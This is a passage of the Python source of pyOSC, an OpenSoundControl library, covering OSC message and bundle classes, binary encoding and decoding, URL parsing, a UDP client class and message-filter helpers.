This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets, and also provides support
for TCP/IP streaming, in which case the message size is prepended as an int32
(big endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy creation & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSCClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
from __future__ import print_function
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
if sys.version_info[0] > 2:
long = int
from socketserver import UDPServer, DatagramRequestHandler, ThreadingMixIn, StreamRequestHandler, TCPServer
try:
from socketserver import ForkingMixIn
except ImportError:
ForkingMixIn = ThreadingMixIn
else:
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [float]
global IntTypes
IntTypes = [int]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
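# (the NTP fractional field counts 2**32 units per second, so one unit is
#  1/2**32 s, i.e. roughly 232.8 picoseconds)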
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = bytes()
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == dict:
argument = list(argument.items())
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if isinstance(argument, (tuple, list)):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(list(self.values())))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(list(self.values()))
if type(values) == tuple:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
# print(self.getBinary().decode())
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = list(self.values())
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in list(self.values()))
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return list(self.values())[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = list(self.items())
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = list(values.items())
elif type(values) == list:
items = []
for val in values:
if type(val) == tuple:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == tuple:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = list(self.items())
new_items = self._buildItemList(val)
if type(i) != slice:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = list(self.items())
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return list(self.values()).count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return list(self.values()).index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = list(self.items()) + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = list(self.items())
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = list(self.items())
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = list(self.items())
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = list(self.items())
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(v))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(list(self.values()))
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(list(self.values()))
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(list(self.items()))
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in list(self.values()):
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsulated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == dict:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
# print(decoded)
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
# print("Bundle binary:", self.getBinary())
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
if sys.version_info[0] > 2:
next = bytes(next.encode("UTF-8")) # this could be the problem?
else:
next = str(next)
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), next)
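# e.g. OSCString("osc") packs to 'osc\x00' (4 bytes) and OSCString("data")
# packs to 'data\x00\x00\x00\x00' (8 bytes): padding always adds 1 to 4 zero-bytes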
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a multiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in (bytes, str):
if not isinstance(next, bytes):
next = next.encode("UTF-8")  # Python 3 str -> bytes for struct.pack()
# use an int length: math.ceil() returns a float on Python 2
OSCblobLength = int(math.ceil((len(next)) / 4.0) * 4)
# note: the zero-padded length is used as the blob size, mirroring _readBlob()
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = bytes()
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', int(secs), int(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
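# note: a timetag of 0 is encoded as the special OSC "immediately" value
# (seconds=0, fraction=1, i.e. the 8 bytes 00 00 00 00 00 00 00 01)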
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
#length = string.find(data,"\0")
#length = str(data).find("\x00")
length = data.index(b"\x00")
nextData = int(math.ceil((length+1) / 4.0) * 4)
output = (data[0:length].decode(), data[nextData:])
return output
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (int(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low) / NTP_units_per_second
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","): #.encode("utf-8")):
for tag in typetags[1:]:
# print(tag, rest)
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == int:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (isinstance(url, str) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
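# e.g. parseUrlStr("192.168.1.10:8000/synth") returns (('192.168.1.10', 8000), '/synth')
# (illustrative values; a hostname would additionally be resolved via gethostbyname)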
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = (self.socket == other.socket)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return self.server == other.server
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e.errno in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if isinstance(args, str):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
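# e.g. parseFilterStr("/prefix +/a -/b") returns ['/prefix', {'/a': True, '/b': False}]
# (illustrative addresses; the part before the first '+' becomes the prefix)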
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in list(filters.keys()):
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in list(filters.values()):
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in list(filters.items()):
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
if sys.version_info[0] > 2:
OSCtrans = str.maketrans("{,}?","(|).")
else:
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
if type(pattern) is bytes:
pattern = pattern.decode()
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
